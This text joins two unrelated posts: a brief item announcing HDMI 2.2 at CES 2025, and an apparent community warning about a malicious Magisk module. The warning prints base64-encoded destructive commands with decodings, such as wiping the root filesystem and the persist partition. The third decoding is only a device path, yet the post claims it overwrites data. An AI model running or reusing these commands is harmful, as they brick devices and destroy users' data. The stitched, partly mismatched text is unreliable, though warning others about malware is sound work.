HDMI 2.2 will launch at CES 2025 on January 6!

The speculations have been going around after the HDMI Licensing Administrator was seen discussion the "license version 2.2 of HDMI Specifications" in an email. This email confirms the existence of HDMI with new specs, but we don't know if the next-gen GPUs will support it.

DisplayPort adaption has been slow but we have seen how capable it is. We will have to see how HDMI does in the next release.

🚨 ALERT: Malicious Magisk Module Exposed! 🚨

Y’all, I found a dangerous module (zygisk next pro) that can wreck your phone. If you’re into Android modding, beware of this one before it wrecks your device.

What Does It Do and How Does It Hide the Damage?

This module uses base64 encoding to hide dangerous commands:

1. Wipes Everything on Your Phone

Encoded Command: cm0gLXJmIC8qCg==

Decoded Command: rm -rf /*

Effect: Deletes everything—apps, files, system—turns your phone into a brick.

2. Destroys Critical Hardware Data

Encoded Command: cm0gLXJmIC9tbnQvdmVuZG9yL3BlcnNpc3QvKiAmCg==

Decoded Command: rm -rf /mnt/vendor/persist/*

Effect: Destroys key data like Wi-Fi settings and IMEI. No Wi-Fi, no calls.

3. Scrambles Your Data Forever

Encoded Command: L2Rldi9ibG9jay9ieS1uYW1lL3VzZXJkYXRhCg==

Decoded Command: /dev/block/by-name/userdata

Effect: Overwrites your data with junk. Photos, videos, files—gone for good
Where Is It From?

This malicious module is hosted on GitHub and spread across various telegram groups.

What Should You Do?

1. Don’t install random Magisk modules unless you trust the source.

2. Share this post with anyone you know who mods their phone. Let’s stop this scam from spreading.
